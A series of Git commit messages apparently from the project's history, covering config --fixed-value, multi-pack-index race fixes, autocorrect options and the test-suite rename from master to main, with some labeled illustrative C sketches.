Reported-by: Jonathan Nieder <jrnieder@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* ds/config-literal-value:
config doc: value-pattern is not necessarily a regexp
config: implement --fixed-value with --get*
config: plumb --fixed-value into config API
config: add --fixed-value option, un-implemented
t1300: add test for --replace-all with value-pattern
t1300: test "set all" mode with value-pattern
config: replace 'value_regex' with 'value_pattern'
config: convert multi_replace to flags
The introductory part of the "git config --help" mentions the
optional value-pattern argument, but gives no hint that it can be
something other than a regular expression (worse, it just says
"POSIX regexp", which usually means BRE but the regexp the command
takes is ERE). Also, it needs to be documented that the '!' prefix
to negate the match, which is only mentioned in this part of the
document, works only with regexp and not with the --fixed-value.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The config builtin does its own regex matching of values for the --get,
--get-all, and --get-regexp modes. Plumb the existing 'flags' parameter
to the get_value() method so we can initialize the value-pattern argument
as a fixed string instead of a regex pattern.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The git_config_set_multivar_in_file_gently() and related methods now
take a 'flags' bitfield, so add a new bit representing the --fixed-value
option from 'git config'. This alters the purpose of the value_pattern
parameter to be an exact string match. This requires some initialization
changes in git_config_set_multivar_in_file_gently() and a new strcmp()
call in the matches() method.
The new CONFIG_FLAGS_FIXED_VALUE flag is initialized in builtin/config.c
based on the --fixed-value option, and that needs to be updated in
several callers.
This patch only affects some of the modes of 'git config', and the rest
will be completed in the next change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
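A sketch of how a fixed-value flag can switch a match between strcmp()
and an extended regular expression. CONFIG_FLAGS_FIXED_VALUE is the flag
named in the message above, but its bit position here is an assumption,
and value_matches() is a hypothetical stand-in for the real matches()
method.

```c
#include <assert.h>
#include <regex.h>
#include <stddef.h>
#include <string.h>

#define CONFIG_FLAGS_FIXED_VALUE (1u << 1) /* bit position assumed */

/*
 * Returns 1 if 'value' matches 'pattern', 0 if it does not, and -1 if
 * 'pattern' is not a valid extended regular expression.
 */
int value_matches(const char *value, const char *pattern, unsigned flags)
{
	regex_t re;
	int ret;

	assert(value && pattern);
	if (flags & CONFIG_FLAGS_FIXED_VALUE)
		return !strcmp(value, pattern); /* exact string match */

	if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB))
		return -1;
	ret = !regexec(&re, value, 0, NULL, 0);
	regfree(&re);
	return ret;
}
```

A path such as "/tmp/a+b" shows the difference: as a regex the '+' is a
quantifier, so the pattern does not match its own literal text, while
the fixed-value comparison does.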
The 'git config' builtin takes a 'value-pattern' parameter for several
actions. This can cause confusion when expecting exact value matches
instead of regex matches, especially when the input string contains
metacharacters. While callers can escape the patterns themselves, it
would be more friendly to allow an argument to disable the pattern
matching in favor of an exact string match.
Add a new '--fixed-value' option that does not currently change the
behavior. The implementation will be filled in by later changes for
each appropriate action. For now, check and test that --fixed-value
will abort the command when included with an incompatible action or
without a 'value-pattern' argument.
The name '--fixed-value' was chosen over something simpler like
'--fixed' because some commands allow regular expressions on the
key in addition to the value.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --replace-all option was added in 4ddba79d (git-config-set: add more
options) but was not tested along with the 'value-pattern' parameter.
Since we will be updating this option to optionally treat 'value-pattern'
as a fixed string, let's add a test here that documents the current
behavior.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Without additional modifiers, 'git config <key> <value>' attempts
to set a single value in the .git/config file. When the
value-pattern parameter is supplied, this command behaves in a
non-trivial manner.
Consider 'git config <key> <value> <value-pattern>'. The expected
behavior is as follows:
1. If there are multiple existing values that match 'value-pattern',
then the command fails. Users should use --replace-all instead.
2. If no existing values match 'value-pattern', then the
'key=value' pair is appended, making this 'key' a multi-valued
config setting.
3. If there is one existing value that matches 'value-pattern', then
the new config has one entry where 'key=value'.
Add a test that demonstrates these options. Break from the existing
pattern in t1300-config.sh to use 'git config --file=<file>' instead of
modifying .git/config directly to prevent possibly incompatible repo
states. Also use 'git config --file=<file> --list' for config state
comparison instead of the config file format. This makes the tests
more readable.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
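The three cases listed in the message above can be modelled with a short
sketch that counts how many existing values match the pattern. This is
not the config machinery itself: classify_set() and the enum names are
hypothetical, and the pattern is treated as an extended regular
expression.

```c
#include <assert.h>
#include <regex.h>
#include <stddef.h>

enum set_outcome {
	SET_ERROR = -1,     /* pattern failed to compile */
	SET_FAILS_MULTIPLE, /* case 1: several matches, command fails */
	SET_APPENDS,        /* case 2: no match, key=value is appended */
	SET_REPLACES        /* case 3: one match, it is replaced */
};

/* Decide which of the three cases applies to the existing values. */
enum set_outcome classify_set(const char **existing, size_t nr,
			      const char *value_pattern)
{
	regex_t re;
	size_t i, hits = 0;

	assert(existing && value_pattern);
	if (regcomp(&re, value_pattern, REG_EXTENDED | REG_NOSUB))
		return SET_ERROR;
	for (i = 0; i < nr; i++)
		if (!regexec(&re, existing[i], 0, NULL, 0))
			hits++;
	regfree(&re);

	if (hits > 1)
		return SET_FAILS_MULTIPLE;
	return hits ? SET_REPLACES : SET_APPENDS;
}
```

Given existing values "one", "two" and "three", the pattern "^t" hits
two of them (case 1), "^o" hits exactly one (case 3), and "^x" hits none
(case 2).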
The 'value_regex' argument in the 'git config' builtin is poorly named,
especially related to an upcoming change that allows exact string
matches instead of ERE pattern matches.
Perform a mostly mechanical change of every instance of 'value_regex' to
'value_pattern' in the codebase. This is only critical for documentation
and error messages, but it is best to be consistent inside the codebase,
too.
For documentation, use 'value-pattern' which is better punctuation. This
affects Documentation/git-config.txt and the usage in builtin/config.c,
which was already mixed between 'value_regex' and 'value-regex'.
I gave some thought to leaving the value_regex variables inside config.c
that are regex_t pointers. However, it is probably best to keep the name
consistent with the rest of the variables.
This does not update the translations inside the po/ directory, as that
creates conflicts with ongoing work. The input strings should
automatically update through automation, and a few of the output strings
currently use "[value_regex]" directly.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We will extend the flexibility of the config API. Before doing so, let's
take an existing 'int multi_replace' parameter and replace it with a new
'unsigned flags' parameter that can take multiple options as a bit field.
Update all callers that specified multi_replace to now specify the
CONFIG_FLAGS_MULTI_REPLACE flag. To add more clarity, extend the
documentation of git_config_set_multivar_in_file() including a clear
labeling of its arguments. Other config API methods in config.h require
only a change of the final parameter from 'int' to 'unsigned'.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
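A sketch of the int-to-flags conversion described in the message above.
The flag names come from this series, but the bit values and both helper
functions are assumptions made for illustration.

```c
#include <assert.h>

/* Bit values are assumptions for this sketch. */
#define CONFIG_FLAGS_MULTI_REPLACE (1u << 0)
#define CONFIG_FLAGS_FIXED_VALUE   (1u << 1)

/* Translate the old 'int multi_replace' argument into a flags word. */
unsigned flags_from_legacy(int multi_replace)
{
	return multi_replace ? CONFIG_FLAGS_MULTI_REPLACE : 0;
}

/* Callee side: test one bit without disturbing the others. */
int wants_multi_replace(unsigned flags)
{
	return !!(flags & CONFIG_FLAGS_MULTI_REPLACE);
}
```

Because each option occupies its own bit, a later flag such as
CONFIG_FLAGS_FIXED_VALUE can be OR-ed in without changing any function
signature again.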
When a packed object is stored in a multi-pack index, but that pack has
racily gone away, the MIDX code simply calls die(), when it could be
returning an error to the caller, which would in turn lead to
re-scanning the pack directory.
A pack can racily disappear, for example, due to a simultaneous 'git
repack -ad'.
You can also reproduce this with two terminals, where one is running:
git init
while true; do
    git commit -q --allow-empty -m foo
    git repack -ad
    git multi-pack-index write
done
(in effect, constantly writing new MIDXs), and the other is running:
obj=$(git rev-parse HEAD)
while true; do
    echo $obj | git cat-file --batch-check='%(objectsize:disk)' || break
done
That will sometimes hit the "error preparing packfile from
multi-pack-index" message, which this patch fixes.
Right now, that path to discovering a missing pack looks something like
'find_pack_entry()' calling 'fill_midx_entry()' and eventually making
its way to call 'nth_midxed_pack_entry()'.
'nth_midxed_pack_entry()' already checks 'is_pack_valid()' and
propagates an error if the pack is invalid. So, this works if the pack
has gone away between calling 'prepare_midx_pack()' and before calling
'is_pack_valid()', but not if it disappears before then.
Catch the case where the pack has already disappeared before
'prepare_midx_pack()' by returning an error in that case, too.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 17c35c8969 (packfile: skip loading index if in multi-pack-index,
2018-07-12) we stopped loading the .idx file for packs that are
contained within a multi-pack index.
This saves us the effort of loading an .idx and doing some lightweight
validity checks by way of 'packfile.c:load_idx()', but introduces a race
between processes that need to load the index (e.g., to generate a
reverse index) and processes that can delete the index.
For example, running the following in your shell:
$ git init repo && cd repo
$ git commit --allow-empty -m 'base'
$ git repack -ad && git multi-pack-index write
followed by:
$ rm -f .git/objects/pack/pack-*.idx
$ git rev-parse HEAD | git cat-file --batch-check='%(objectsize:disk)'
will result in a segfault prior to this patch. What's happening here is
that we notice that the pack is in the multi-pack index, and so don't
check that it still has a .idx. When we then try and load that index to
generate a reverse index, we don't have it, so the call to
'find_pack_revindex()' in 'packfile.c:packed_object_info()' returns
NULL, and then dereferencing it causes a segfault.
Of course, we don't ever expect someone to remove the index file by
hand, or to be in a state where we never wrote it to begin with (yet
find that pack in the multi-pack-index). But, this can happen in a
timing race with 'git repack -ad', which removes all existing packs
after writing a new pack containing all of their objects.
Avoid this by reverting the hunk of 17c35c8969 which stops loading the
index when the pack is contained in a MIDX. This makes the latter half
of 17c35c8969 useless, since we'll always have a non-NULL
'p->index_data', in which case that if statement isn't guarding
anything.
These two together effectively revert 17c35c8969, and avoid the race
explained above.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While help.autocorrect can be set to 0 to decline auto-execution of
possibly mistyped commands, it still spends cycles to compute the
suggestions, and it wastes screen real estate.
Update help.autocorrect to accept the string "never" to just exit
with error upon mistyped commands to help users who prefer to never
see suggested corrections at all.
While at it, introduce "immediate" as a more readable way to
immediately execute the auto-corrected command, which can be done
with a negative value.
Signed-off-by: Drew DeVault <sir@cmpwn.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
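One way the extended help.autocorrect values could be parsed is sketched
below. The strings "never" and "immediate" come from the message above;
the sentinel constants and parse_autocorrect() are hypothetical, and
their numeric values are assumptions.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Sentinel values are assumptions for this sketch. */
#define AUTOCORRECT_NEVER       (-2)
#define AUTOCORRECT_IMMEDIATELY (-1)

/*
 * Map a help.autocorrect value to a setting:
 *   "never"      -> never compute or show suggestions
 *   "immediate"  -> run the corrected command right away
 *   negative int -> same as "immediate"
 *   other int    -> kept as-is (0 declines auto-execution)
 */
int parse_autocorrect(const char *value)
{
	long v;

	assert(value);
	if (!strcmp(value, "never"))
		return AUTOCORRECT_NEVER;
	if (!strcmp(value, "immediate"))
		return AUTOCORRECT_IMMEDIATELY;
	v = strtol(value, NULL, 10);
	return v < 0 ? AUTOCORRECT_IMMEDIATELY : (int)v;
}
```

Keeping "never" distinct from 0 is the point of the change: 0 still
computes and prints suggestions, while "never" skips that work.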
When holding the lock for rewriting the credential file, use a timeout
to avoid race conditions when the credentials file needs to be updated
in parallel.
An example would be doing `fetch --all` on a repository with several
remotes that need credentials, using parallel fetching.
The timeout can be configured using "credentialStore.lockTimeoutMS",
defaulting to 1 second.
Signed-off-by: Simão Afonso <simao.afonso@powertools-tech.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
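Retrying a lock until a timeout expires can be sketched as below. This
is only an illustration of the idea: lock_with_timeout() is a
hypothetical helper built on open(2) with O_EXCL and a fixed 10ms retry
step, and does not reflect how Git's own lockfile code chooses its
delays.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <time.h>
#include <unistd.h>

/*
 * Try to create 'lock_path' exclusively, retrying every 10ms while
 * another process holds it. Returns an open file descriptor on
 * success, or -1 once 'timeout_ms' has elapsed or on any other error.
 */
int lock_with_timeout(const char *lock_path, long timeout_ms)
{
	const long step_ms = 10; /* retry interval, assumed */
	long waited = 0;

	assert(lock_path);
	for (;;) {
		struct timespec ts = { 0, step_ms * 1000000L };
		int fd = open(lock_path, O_WRONLY | O_CREAT | O_EXCL, 0600);

		if (fd >= 0 || errno != EEXIST)
			return fd; /* got the lock, or a real error */
		if (waited >= timeout_ms)
			return -1; /* still held by someone else */
		nanosleep(&ts, NULL);
		waited += step_ms;
	}
}
```

With a timeout of 0 this behaves like a single attempt; a value such as
the 1 second default mentioned above gives competing processes time to
finish and release the lock.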
The sleep function is defined in wrapper.c, so it makes more sense for it
to be in a system compatibility header.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Emit a trace2 error event whenever warning() is called, just like when
die(), error(), or usage() is called.
This helps debugging issues that would trigger warnings but not errors.
In particular, this might have helped debugging an issue I encountered
with commit graphs at $DAYJOB [1].
There is a tradeoff between including potentially relevant messages and
cluttering up the trace output produced. I think that warning() messages
should be included in traces, because by its nature, Git is used over
multiple invocations of the Git tool, and a failure (currently traced)
in a Git invocation might be caused by an unexpected interaction in a
previous Git invocation that only has a warning (currently untraced) as
a symptom - as is the case in [1].
[1] https://lore.kernel.org/git/20200629220744.1054093-1-jonathantanmy@google.com/
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A review exchange may begin with a reviewer asking "what did you
mean by this phrase in your log message (or here in the doc)?", the
author answering what was meant, and then the reviewer saying "ah,
that is what you meant---then the flow of the logic makes sense".
But that is not the happy end of the story. New contributors often
forget that the material that has been reviewed in the above exchange
is still unclear in the same way to the next person who reads it,
until it gets updated.
While we are in the vicinity, rephrase the verb "request" used to
refer to comments by reviewers to "suggest"---this matches the
contrast between "original" and "suggested" that appears later in
the same paragraph, and more importantly makes it clearer that it is
not like authors are to please reviewers' wishes but rather
reviewers are merely helping authors to polish their commits.
Reviewed-by: Emily Shaffer <emilyshaffer@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we can override the default branch name in the tests via
`GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME`, we should avoid expecting a
particular hard-coded name.
So let's rename the initial branch immediately to `primary` and work
with that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 1c1518071c (submodule: use "fetch" logic instead of custom remote
discovery, 2020-11-14) rewrote the logic in fetch_in_submodule to do:
elif test "$2" -ne ""
But this is nonsense in shell: -ne is for numeric comparisons. This
should be "=" or more idiomatically:
elif test -n "$2"
But once we fix that, many tests start failing. Because that commit
introduced another problem. The caller that passes 3 arguments looks
like this:
fetch_in_submodule "$sm_path" $depth "$sha1"
Note the unquoted $depth parameter. When it isn't set, the function will
see only 2 arguments, and the function has no idea if what it sees in $2
is an option to go on the command line, or a refspec to pass on stdin.
In the old code before that commit:
 fetch_in_submodule () (
     sanitize_submodule_env &&
     cd "$1" &&
-    case "$2" in
-    '')
-        git fetch ;;
-    *)
-        shift
-        git fetch $(get_default_remote) "$@" ;;
-    esac
we treated those the same, so it didn't matter. But in the new logic
(with my fix above):
+    if test $# -eq 3
+    then
+        echo "$3" | git fetch --stdin "$2"
+    elif test -n "$2"
+    then
+        git fetch "$2"
+    else
+        git fetch
+    fi
we use the number of parameters to distinguish the two. Let's insist
that the caller pass an empty string for positional parameter two if
they want to have a third parameter after it.
But that still leaves one problem. In the --stdin block, we
unconditionally pass "$2" to git-fetch, even if it's the empty string.
Rather than add another conditional, we can use :+ parameter expansion
to include it only if it's non-empty. In fact, we can do the same for
the elif, too, simplifying it further. Technically this is overkill,
since we know the --depth parameter will not have whitespace (and
indeed, most callers do not bother quoting it), but it doesn't hurt for
the function to be careful.
It's somewhat amazing that no tests were failing. I think what happened
is that:
- the 3-arg form rarely triggered; any call with a non-empty $depth
and a $sha1 would work, but one with an empty $depth would only have
2 arguments
- because of the wrong arguments to "test", the shell would complain
and exit non-zero. So we never ran the middle conditional at all
- that left every call running "git fetch" with no arguments. A
well-written test could have detected the distinction here, but in
practice omitting --depth just means fetching more commits, and
fetching everything (rather than a single sha1) works as long as the
commit in question is reachable
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Advanced and expert users may want to know how 'git maintenance start'
schedules background maintenance in order to customize their own
schedules beyond what the maintenance.* config values allow. Start a new
set of sections in git-maintenance.txt that describe how 'cron' is used
to run these tasks.
This is particularly valuable for users who want to inspect what Git is
doing or for users who want to customize the schedule further. Having a
baseline can provide a way forward for users who have never worked with
cron schedules.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The existing schedule mechanism using 'cron' is supported by POSIX
platforms, but not Windows. It also works slightly differently on
macOS, to the significant detriment of the user experience. To allow for
new implementations on these platforms, extract a method that
performs the platform-specific scheduling mechanism. This will be
swapped at compile time with new implementations on specialized
platforms.
As we add this generality, rename GIT_TEST_CRONTAB to
GIT_TEST_MAINT_SCHEDULER. Further, this variable is now parsed as
"<scheduler>:<command>" so we can test platform-specific scheduling
logic even when not on the correct platform. By specifying the
<scheduler> in this string, we will be able to test all three sets of
Git logic from a Linux machine.
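To make the "<scheduler>:<command>" format concrete, here is a small
shell sketch of how such a value splits at the first colon. Git does
this parsing in C; the function name, the variable names and the sample
value below are only illustrative assumptions:

```shell
# Hypothetical helper: split "<scheduler>:<command>" at the first colon.
# Sets $scheduler and $sched_cmd; fails if there is no colon at all.
split_scheduler () {
	case "$1" in
	*:*)
		scheduler=${1%%:*}  # everything before the first ":"
		sched_cmd=${1#*:}   # everything after the first ":"
		;;
	*)
		return 1
		;;
	esac
}

# Sample value, chosen for illustration only.
split_scheduler "crontab:test-tool crontab cron.txt" &&
echo "scheduler=$scheduler command=$sched_cmd"
```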
Co-authored-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Restore a space that was lost in 8a0fc8d19d (stash: convert apply to
builtin, 2019-02-25).
Signed-off-by: Kyle Meyer <kyle@kyleam.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If notes.displayRef is configured with no value[1], control should be
returned to the caller when notes.c:notes_display_config() checks if 'v'
is NULL. Otherwise, both git log --notes and git diff-tree --notes will
subsequently segfault when refs.h:has_glob_specials() calls strpbrk()
with a NULL first argument.
[1] Examples:
.git/config:
[notes]
displayRef
$ git -c notes.displayRef [...]
Signed-off-by: Nate Avers <nate@roosteregg.cc>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix regression introduced when nvimdiff support in mergetool was added.
* pd/mergetool-nvimdiff:
mergetool: avoid letting `list_tool_variants` break user-defined setups
mergetools/bc: add `bc4` to the alias list for Beyond Compare
A specialization of hashmap that uses a string as key has been
introduced. Hopefully it will see wider use over time.
* en/strmap:
shortlog: use strset from strmap.h
Use new HASHMAP_INIT macro to simplify hashmap initialization
strmap: take advantage of FLEXPTR_ALLOC_STR when relevant
strmap: enable allocations to come from a mem_pool
strmap: add a strset sub-type
strmap: split create_entry() out of strmap_put()
strmap: add functions facilitating use as a string->int map
strmap: enable faster clearing and reusing of strmaps
strmap: add more utility functions
strmap: new utility functions
hashmap: provide deallocation function names
hashmap: introduce a new hashmap_partial_clear()
hashmap: allow re-use after hashmap_free()
hashmap: adjust spacing to fix argument alignment
hashmap: add usage documentation explaining hashmap_free[_entries]()
Running "git diff" while allowing external diff in a state with
unmerged paths used to segfault, which has been corrected.
* jk/diff-release-filespec-fix:
t7800: simplify difftool test
diff: allow passing NULL to diff_free_filespec_data()
"git rev-parse" learned the "--end-of-options" to help scripts to
safely take a parameter that is supposed to be a revision, e.g.
"git rev-parse --verify -q --end-of-options $rev".
* jk/rev-parse-end-of-options:
rev-parse: handle --end-of-options
rev-parse: put all options under the "-" check
rev-parse: don't accept options after dashdash
The maximum length of output filenames "git format-patch" creates
has become configurable (used to be capped at 64).
* jc/format-patch-name-max:
format-patch: make output filename configurable
In 15fabd1bbd ("builtin/grep.c: make configuration callback more
reusable", 2012-10-09), we learned to fill a `static struct grep_opt
grep_defaults` which we can use as a blueprint for other such structs.
At the time, we didn't consider designated initializers to be widely
useable, but these days, we do. (See, e.g., cbc0f81d96 ("strbuf: use
designated initializers in STRBUF_INIT", 2017-07-10).)
Use designated initializers to let the compiler set up the struct and so
that we don't need to remember to call `init_grep_defaults()`.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`init_grep_defaults()` fills a `static struct grep_opt grep_defaults`.
This struct is then used by `grep_init()` as a blueprint for other such
structs. Notably, `grep_init()` takes a `struct repo *` and assigns it
into the target struct.
As a result, it is unnecessary for us to take a `struct repo *` in
`init_grep_defaults()` as well. We assign it into the default struct and
never look at it again. And in light of how we return early if we have
already set up the default struct, it's not just unnecessary, but is
also a bit confusing: If we are called twice and with different repos,
is it a bug or a feature that we ignore the second repo?
Drop the repo parameter for `init_grep_defaults()`.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We spawn an external pack-objects process to actually send
objects to the remote side. If we are killed by a signal
during this process, the pack-objects will keep running and
complete the push, which may surprise the user. We should
take it down when we go down.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git worktree add` (without --force) errors out when given a path
that is already registered as a worktree and the path is missing on
disk. But the `cmd` and `path` strings are swapped in the error
message. Let's fix that.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As noted in an earlier change the keep_base_pack variable name is a
relic from an earlier on-list version of ae4e89e549 ("gc: add
--keep-largest-pack option", 2018-04-15) before it was renamed to
--keep-largest-pack.
Let's change the variable name to avoid that confusion; the code is
easier to read when there is a 1:1 mapping between the variable name
and the option name.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --keep-base-pack option never existed in git.git. It was the name
for the --keep-largest-pack option in earlier revisions of that series
before it landed as ae4e89e549 ("gc: add --keep-largest-pack option",
2018-04-15).
The later patches in that series[1][2] weren't changed to also refer
to --keep-largest-pack, so we've had this reference to a nonexistent
option ever since the feature initially landed.
1. 55dfe13df9 ("gc: add gc.bigPackThreshold config", 2018-04-15)
2. 9806f5a7bf ("gc --auto: exclude base pack if not enough mem to
"repack -ad"", 2018-04-15)
Reported-by: Luc Van Oostenryck <luc.vanoostenryck@gmail.com>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We introduced the `PREPARE_FOR_MAIN_BRANCH` prereq for the sole purpose
of allowing us to perform the non-trivial adjustments regarding the
`master` -> `main` rename before the automatable ones.
Now that the transition is almost complete, we can stop using it in most
instances. The only two exceptions are t5526 and t9902: at the time of
writing, there are other patches in flight that touch these test
scripts, therefore their transition to `main` is postponed to a later
date.
This patch is the result of this command:
sed -i 's/PREPARE_FOR_MAIN_BRANCH[ ,]//' t/t[0-9]*.sh &&
git checkout HEAD -- t/t5526\* t/t9902\*
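For illustration, this is what the substitution does to two made-up
test headers (strip_prereq is a hypothetical wrapper around the same
sed expression, reading from stdin instead of editing files in place):

```shell
# Hypothetical wrapper around the sed expression used above.
strip_prereq () {
	sed 's/PREPARE_FOR_MAIN_BRANCH[ ,]//'
}

# Sample input lines, invented for this sketch.
printf '%s\n' \
	"test_expect_success PREPARE_FOR_MAIN_BRANCH 'setup' '" \
	"test_expect_success PREPARE_FOR_MAIN_BRANCH,SYMLINKS 'links' '" |
strip_prereq
```

The first line loses the prereq together with the following space, the
second one loses it together with the comma, leaving SYMLINKS as the
only remaining prereq.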
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t9902, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t9903. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t99*.sh lib-cvs.sh &&
git checkout HEAD -- t9902\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for all tests (except the ones we specifically excluded for now).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the previous commits, we adjusted the test suite to use the branch
name `main` for initial branches.
The `git p4`-related tests are a bit harder to adjust because `git p4`
uses the ref `refs/heads/p4/master` to track the remote branches, and
for now, we do not want to change that (this might be the subject of a
future patch series). We only need to adjust for the actual initial
branch name to be changed to `main`.
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t9[5-7]*.sh lib-cvs.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t9[0-4]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t8*.sh annotate*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Excluding t7817, which is added in an unrelated patch series at the time
of writing, this adjusts t7[5-9]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t7[5-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t7064, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t7[0-4]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t7[0-4]*.sh &&
git checkout HEAD -- t7064\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t6[4-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are in the process of renaming the default branch name to `main`,
which is two characters shorter than `master`. Therefore, some lines
need to be adjusted in t6416, t6422 and t6427 that want to align text
involving the default branch name.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Carefully excluding t6300, which sees independent development elsewhere
at the time of writing, we use `main` as the default branch name in
t6[0-3]*. This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t6[0-3]*.sh &&
git checkout HEAD -- t6300\*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t5[6-9]*.sh)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ (cd t &&
sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -e 's/retsam/niam/g' \
-- t55[4-9]*.sh t556x*)
This allows us to define `GIT_TEST_DEFAULT_INITIAL_BRANCH_NAME=main`
for those tests.
